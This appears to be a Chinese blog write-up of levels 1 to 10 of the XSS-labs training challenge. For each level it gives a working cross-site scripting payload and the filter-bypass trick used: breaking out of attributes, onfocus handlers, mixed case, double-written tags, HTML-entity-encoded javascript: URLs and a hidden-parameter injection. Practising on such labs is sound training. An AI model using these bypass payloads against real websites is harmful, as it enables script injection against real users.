XSS-libs

第一关

payload:<script>alert(1)</script>

image 50 - XSS-libs

第二关

payload:"><script>alert(1)</script>

输入普通的payload

image 51 - XSS-libs

查看源码

image 52 - XSS-libs

发现<>被编码了 尝试将value前的input进行包裹 使用"><script>alert(1)</script>

image 53 - XSS-libs

第三关

payload: 1' autofocus onfocus=alert(1) x="

image 54 - XSS-libs

先输入<script>alert(1)</script>

image 55 - XSS-libs

查看源码

image 56 - XSS-libs

发现尖括号被编码了 使用1' autofocus onfocus=alert(1) x="绕过

image 57 - XSS-libs

第四关

payload:1" autofocus onfocus=alert(1) x="

输入<script>alert(1)</script>

image 58 - XSS-libs

发现尖括号被过滤了

image 59 - XSS-libs

还是构造标签绕过 1" autofocus onfocus=alert(1) x="

image 61 - XSS-libs

第五关

payload:"> <a href="javascript:alert('xss')">

使用"><script>alert(1)<script>

image 62 - XSS-libs

查看源码 发现第一个script中间加了一个_

image 63 - XSS-libs

尝试1" autofocus onfocus=alert(1) x=" 发现on中间加了一个_

image 64 - XSS-libs

使用不带on的语句"> <a href="javascript:alert('xss')">

image 65 - XSS-libs

第六关

payload"><SCript>alert(1)</script>

image 66 - XSS-libs

使用script

image 67 - XSS-libs

查看源码

发现第一个script还是中间加了_

尝试大小写绕过

image 68 - XSS-libs

第七关

payload:"><ScrSCRIPtipt>alert(1)</sCRscripTIPT>

image 70 - XSS-libs

查看源码

image 71 - XSS-libs

双写绕过

image 72 - XSS-libs

第八关

payload:

&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0027;&#x0078;&#x0073;&#x0073;&#x0027;&#x0029;
image 73 - XSS-libs

查看源码

image 74 - XSS-libs

这关将" script on 给绕过了 使用16进制ascii编码绕过

image 75 - XSS-libs

第九关

payload:

java&#115;&#99;&#114;&#105;&#112;&#116;:alert('http://xss')
image 76 - XSS-libs

查看源码

image 77 - XSS-libs

在href标签中插入JavaScript

image 79 - XSS-libs

这里猜测可能是输入的内容必须要带链接 这边随机加一个链接上去

image 80 - XSS-libs

发现script中间插入了一个_ 这里想到的就是编码 而且链接必须得带http https不行

最后使用payload成功弹窗

image 81 - XSS-libs

第十关

payload:t_link=&t_history=&t_sort=" onclick="alert(1)" type=""

image 82 - XSS-libs

查看源码

image 83 - XSS-libs

发现<><>被编码了 而且 多了三个input标签

尝试对每个input标签插入script语句

image 84 - XSS-libs

发现t_sort中value值有回显

对t_sort进行构造t_link=&t_history=&t_sort=" onclick="alert(1)" type=""

image 85 - XSS-libs

[ACTF2020 新生赛]Include

上一篇

[GXYCTF2019]BabySQli

下一篇
评论
发表评论 说点什么
还没有评论
49